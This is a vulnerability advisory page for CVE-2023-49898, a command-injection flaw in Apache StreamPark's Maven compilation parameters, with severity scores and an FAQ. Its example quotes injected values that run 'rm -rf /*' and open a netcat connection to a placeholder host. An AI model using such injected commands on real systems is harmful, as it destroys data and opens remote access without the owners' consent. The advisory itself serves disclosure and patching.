CVE-2023-49898

Apache StreamPark (incubating): Authenticated system users could trigger remote command execution

Description

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

Category

7.2
CVSS
Severity: High
CVSS 3.1 •
EPSS 1.90% Top 20%
Vendor Advisory apache.org
Affected: Apache Software Foundation Apache StreamPark (incubating)
Published at:
Updated at:

References

Frequently Asked Questions

What is the severity of CVE-2023-49898?
CVE-2023-49898 has been scored as a high severity vulnerability.
How to fix CVE-2023-49898?
To fix CVE-2023-49898, make sure you are using an up-to-date version of the affected component(s) by checking the vendor release notes. As for now, there are no other specific guidelines available.
Is CVE-2023-49898 being actively exploited in the wild?
It is possible that CVE-2023-49898 is being exploited or will be exploited in a near future based on public information. According to its EPSS score, there is a ~2% probability that this vulnerability will be exploited by malicious actors in the next 30 days.
What software or system is affected by CVE-2023-49898?
CVE-2023-49898 affects Apache Software Foundation Apache StreamPark (incubating).
This platform uses data from the NIST NVD, MITRE CVE, MITRE CWE, First.org and CISA KEV but is not endorsed or certified by these entities. CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site.
© 2025 Under My Watch. All Rights Reserved.